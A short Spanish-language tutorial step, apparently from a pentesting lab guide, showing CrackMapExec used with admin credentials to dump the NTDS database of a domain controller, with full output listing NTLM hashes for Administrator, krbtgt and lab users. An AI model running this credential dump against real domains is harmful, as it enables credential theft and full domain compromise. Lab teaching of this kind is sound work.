Utilizando CrackMapExec

Nosotros podemos utilizar CrackMapExec con el modulo NTDS para extraer las credenciales de la siguiente manera:

kali@kali=> ./cme smb 3.14.245.175 -u "admin" -p "Password@1" -d "spartancybersec.corp" --ntds     
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] y
SMB         3.14.245.175    445    FIRST-DC         [*] Windows 10.0 Build 17763 x64 (name:FIRST-DC) (domain:spartancybersec.corp) (signing:True) (SMBv1:False)
SMB         3.14.245.175    445    FIRST-DC         [+] spartancybersec.corp\admin:Password@1 (Pwn3d!)
SMB         3.14.245.175    445    FIRST-DC         [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         3.14.245.175    445    FIRST-DC         Administrator:500:aad3b435b51404eeaad3b435b51404ee:c90fb8ae170b856da331fa40d5c11769:::
SMB         3.14.245.175    445    FIRST-DC         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         3.14.245.175    445    FIRST-DC         krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b44daa015f201fa31126895ebbcbbcab:::
SMB         3.14.245.175    445    FIRST-DC         admin:1008:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         regular.user:1112:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         dnsadmin.user:1113:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         unconstrained.user:1114:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         constrained.user:1115:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         userwrite.user:1117:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         userall.user:1118:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         compwrite.user:1120:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         gpowrite.user:1121:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         lapsread.user:1122:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         groupwrite.user:1123:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         writedacldc.user:1124:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         readgmsa.user:1125:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         clearpass.user:1126:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         roast.user:1127:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         asrep.user:1128:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         spartancybersec.corp\adminwebserver:1130:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
SMB         3.14.245.175    445    FIRST-DC         FIRST-DC$:1009:aad3b435b51404eeaad3b435b51404ee:9e24232fd09fa4eb1fdf798597550a40:::
SMB         3.14.245.175    445    FIRST-DC         Suspicious-PC$:1116:aad3b435b51404eeaad3b435b51404ee:d566c257631be77cde24694488ef337d:::
SMB         3.14.245.175    445    FIRST-DC         USER-SERVER$:1129:aad3b435b51404eeaad3b435b51404ee:dadef894e564c991a5a5714e0a7efc67:::
SMB         3.14.245.175    445    FIRST-DC         WEBSERVER$:1131:aad3b435b51404eeaad3b435b51404ee:449c5f226aff8a2af42ac07ebaf901cb:::
SMB         3.14.245.175    445    FIRST-DC         VIKINGSCYBERSEC$:1119:aad3b435b51404eeaad3b435b51404ee:a9e60b71ecaab835b49ec6a56ca99af5:::
SMB         3.14.245.175    445    FIRST-DC         [+] Dumped 25 NTDS hashes to /root/.cme/logs/FIRST-DC_3.14.245.175_2023-11-07_002407.ntds of which 20 were added to the database

Última actualización